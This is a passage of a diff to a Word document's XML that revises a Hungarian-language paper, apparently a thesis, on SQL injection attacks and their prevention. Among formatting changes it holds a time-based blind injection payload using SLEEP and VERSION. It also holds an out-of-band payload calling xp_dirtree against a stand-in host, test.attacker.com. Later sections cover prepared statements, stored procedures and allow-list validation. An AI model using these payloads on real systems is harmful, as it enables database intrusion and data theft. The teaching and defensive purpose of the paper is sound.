-        <w:t>és az oldal tartalma megváltozik az előző hamis állapothoz képest, akkor a támadó arra következtethet, hogy az injekció működik</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A logikai eredménytől (IGAZ vagy HAMIS) függően </w:t>
+        <w:t xml:space="preserve">HAMIS) függően </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5483,73 +5202,78 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>5</w:t>
+        <w:t>[5]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5570,7 +5294,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc70610878"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc70961904"/>
       <w:r>
         <w:t>Sávon kívüli (</w:t>
       </w:r>
@@ -5733,7 +5457,13 @@
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>6</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5781,14 +5511,28 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --</w:t>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>–</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>6</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5817,7 +5561,13 @@
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>6</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5920,7 +5670,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc70610879"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc70961905"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5930,7 +5680,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Megelőzési módjai</w:t>
       </w:r>
       <w:bookmarkEnd w:id="11"/>
@@ -6034,17 +5783,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc70610880"/>
-      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Elkészített utasítások (prepared statements) használata</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6127,7 +5877,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>példáját (7. oldal)</w:t>
+        <w:t>példáját</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6145,7 +5895,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a paraméterezett lekérdezés </w:t>
+        <w:t>a paraméterezett lekérdezés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6193,14 +5955,14 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="1701"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -6242,7 +6004,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="1276"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -6269,69 +6031,30 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Mike Shema</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>2012</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc70610881"/>
-      <w:r>
+        <w:t xml:space="preserve"> [7]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Tárolt eljárások (stored procedures) használata</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6376,14 +6099,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ugyanolyan hatást gyakorolnak, mint a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>paraméterezett lekérdezések.</w:t>
+        <w:t>ugyanolyan hatást gyakorolnak, mint a paraméterezett lekérdezések.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6419,40 +6135,40 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z 1.2.2-es </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>példában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és magában az adatbázisban tárolják, majd az alkalmazásból meghívják</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>alábbiakban</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
@@ -6469,27 +6185,28 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> és magában az adatbázisban tárolják, majd az alkalmazásból meghívják.</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B98FE05" wp14:editId="36869662">
-            <wp:extent cx="5040000" cy="1629336"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="3" name="Kép 3"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3073BAED" wp14:editId="5AD59E53">
+            <wp:extent cx="4267419" cy="1155759"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="4" name="Kép 4"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6509,7 +6226,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5040000" cy="1629336"/>
+                      <a:ext cx="4267419" cy="1155759"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6525,7 +6242,62 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.2.2-es ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Java példa tárolt eljárásra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [8]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6535,13 +6307,221 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">1.2.2-es ábra: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Java példa tárolt eljárásra </w:t>
+        <w:t xml:space="preserve">Az SQL lekérdezések különböző részei </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">néha </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nem </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">alkalmasak </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>olyan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> változó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> használatára</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>amelye</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> érvényes utasítással vagy értékcímmel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>lehet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> helyettesíteni, hogy az utasítás sikeresen végrehajtható legyen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> („bind variables”).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ilyen helyzetekben a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bemenet </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ellenőrzése</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vagy a lekérdezés újratervezése a legmegfelelőbb védekezés.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z adatbázis </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>táblázat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ainak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vagy oszlop</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ainak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> neve esetén</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> például</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ideális esetben az értékek a kódból származnak, és nem a felhasználói paraméterekből.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Az alábbi példa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy cikluson belül </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6549,7 +6529,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
+        <w:t>t</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6557,37 +6537,146 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">ableName </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>értékének lehetőségeit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, ezzel lekorlátozva az elérhető és lekérhető táblák számát.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128F1A0E" wp14:editId="16E73905">
+            <wp:extent cx="4292821" cy="1384371"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="7" name="Kép 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4292821" cy="1384371"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc70610882"/>
-      <w:r>
-        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1.2.3-as ábra: Java példa adatbázis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tábl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a neveinek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ellenőrzésére </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[8]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6599,45 +6688,77 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-      </w:pPr>
